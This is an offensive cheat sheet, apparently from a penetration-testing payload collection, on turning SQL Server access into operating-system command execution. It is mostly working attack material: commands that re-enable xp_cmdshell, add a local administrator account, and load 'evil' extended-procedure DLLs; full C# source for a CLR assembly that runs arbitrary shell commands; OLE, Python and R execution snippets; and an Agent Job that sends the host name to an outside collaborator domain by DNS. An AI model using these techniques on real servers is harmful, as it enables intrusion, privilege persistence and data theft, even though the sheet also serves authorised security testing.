# MSSQL - Command Execution ## Summary - [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) - [Extended Stored Procedure](#extended-stored-procedure) - [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures) - [CLR Assemblies](#clr-assemblies) - [Execute commands using CLR assembly](#execute-commands-using-clr-assembly) - [Manually creating a CLR DLL and importing it](#manually-creating-a-clr-dll-and-importing-it) - [OLE Automation](#ole-automation) - [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures) - [Agent Jobs](#agent-jobs) - [Execute commands through SQL Agent Job service](#execute-commands-through-sql-agent-job-service) - [List All Jobs](#list-all-jobs) - [External Scripts](#external-scripts) - [Python](#python) - [R](#r) ## Command Execution via xp_cmdshell > xp_cmdshell disabled by default since SQL Server 2005 ```ps1 PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami # Creates and adds local user backup to the local administrators group: PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add'" -Verbose PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose ``` * Manually execute the SQL query ```sql EXEC xp_cmdshell "net user"; EXEC master..xp_cmdshell 'whoami' EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'; EXEC master.dbo.xp_cmdshell 'ping'; ``` * If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005) ```sql EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; ``` * If the procedure was uninstalled ```sql sp_addextendedproc 'xp_cmdshell','xplog70.dll' ``` ## Extended Stored Procedure ### Add the extended stored procedure and list extended stored procedures ```ps1 # Create evil DLL Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test # Load the DLL and call xp_test Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "sp_addextendedproc 'xp_test', '\\\temp\test.dll'" Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "EXEC xp_test" # Listing existing Get-SQLStoredProcedureXP -Instance "" -Verbose ``` * Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp) * Load the DLL ```sql -- can also be loaded from UNC path or Webdav sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll' EXEC xp_calc sp_dropextendedproc 'xp_calc' ``` ## CLR Assemblies Prerequisites: * sysadmin privileges * CREATE ASSEMBLY permission (or) * ALTER ASSEMBLY permission (or) The execution takes place with privileges of the **service account**. ### Execute commands using CLR assembly ```ps1 # Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop # Execute command using CLR assembly Invoke-SQLOSCmdCLR -Username sa -Password -Instance -Command "whoami" -Verbose Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "" -Command "whoami" Verbose Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose # List all the stored procedures added using CLR Get-SQLStoredProcedureCLR -Instance -Verbose ``` ### Manually creating a CLR DLL and importing it Create a C# DLL file with the following content, with the command : `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs` ```csharp using System; using System.Data; using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.IO; using System.Diagnostics; using System.Text; public partial class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure] public static void cmd_exec (SqlString execCommand) { Process proc = new Process(); proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value); proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; proc.Start(); // Create the record and specify the metadata for the columns. SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000)); // Mark the beginning of the result set. SqlContext.Pipe.SendResultsStart(record); // Set values for each column in the row record.SetString(0, proc.StandardOutput.ReadToEnd().ToString()); // Send the row back to the client. SqlContext.Pipe.SendResultsRow(record); // Mark the end of the result set. SqlContext.Pipe.SendResultsEnd(); proc.WaitForExit(); proc.Close(); } }; ``` Then follow these instructions: 1. Enable `show advanced options` on the server ```sql sp_configure 'show advanced options',1; RECONFIGURE GO ``` 2. Enable CLR on the server ```sql sp_configure 'clr enabled',1 RECONFIGURE GO ``` 3. Trust the assembly by adding its SHA512 hash ```sql EXEC sys.sp_add_trusted_assembly 0x[SHA512], N'assembly'; ``` 4. Import the assembly ```sql CREATE ASSEMBLY my_assembly FROM 'c:\temp\cmd_exec.dll' WITH PERMISSION_SET = UNSAFE; ``` 5. Link the assembly to a stored procedure ```sql CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec]; GO ``` 6. Execute and clean ```sql cmd_exec "whoami" DROP PROCEDURE cmd_exec DROP ASSEMBLY my_assembly ``` **CREATE ASSEMBLY** will also accept an hexadecimal string representation of a CLR DLL ```sql CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM 0x4D5A90000300000004000000F[TRUNCATED] WITH PERMISSION_SET = UNSAFE GO ``` ## OLE Automation * :warning: Disabled by default * The execution takes place with privileges of the **service account**. ### Execute commands using OLE automation procedures ```ps1 Invoke-SQLOSCmdOle -Username sa -Password Password1234 -Instance "" -Command "whoami" Verbose ``` ```ps1 # Enable OLE Automation EXEC sp_configure 'show advanced options', 1 EXEC sp_configure reconfigure EXEC sp_configure 'OLE Automation Procedures', 1 EXEC sp_configure reconfigure # Execute commands DECLARE @execmd INT EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c' ``` ```powershell # https://github.com/blackarrowsec/mssqlproxy/blob/master/mssqlclient.py python3 mssqlclient.py 'host/username:password@' -install -clr Microsoft.SqlServer.Proxy.dll python3 mssqlclient.py 'host/username:password@' -check -reciclador 'C:\windows\temp\reciclador.dll' python3 mssqlclient.py 'host/username:password@' -start -reciclador 'C:\windows\temp\reciclador.dll' SQL> enable_ole SQL> upload reciclador.dll C:\windows\temp\reciclador.dll ``` ## Agent Jobs * The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured. * :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job. ### Execute commands through SQL Agent Job service ```ps1 Invoke-SQLOSCmdAgentJob -Subsystem PowerShell -Username sa -Password Password1234 -Instance "" -Command "powershell e " -Verbose Subsystem Options: –Subsystem CmdExec -SubSystem PowerShell –Subsystem VBScript –Subsystem Jscript ``` ```sql USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ; EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1'; -- delete EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1'; ``` ### List All Jobs ```ps1 SELECT job_id, [name] FROM msdb.dbo.sysjobs; SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id Get-SQLAgentJob -Instance "" -username sa -Password Password1234 -Verbose ``` ## External Scripts Requirements: * Feature 'Advanced Analytics Extensions' must be installed * Enable **external scripts**. ```sql sp_configure 'external scripts enabled', 1; RECONFIGURE; ``` ### Python ```ps1 Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])' WITH RESULT SETS (([cmd_out] nvarchar(max))) ``` ### R ```ps1 Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))' WITH RESULT SETS (([cmd_out] text)); GO @script=N'OutputDataSet <-data.frame(shell("dir",intern=T))' ``` ## References * [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) * [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution)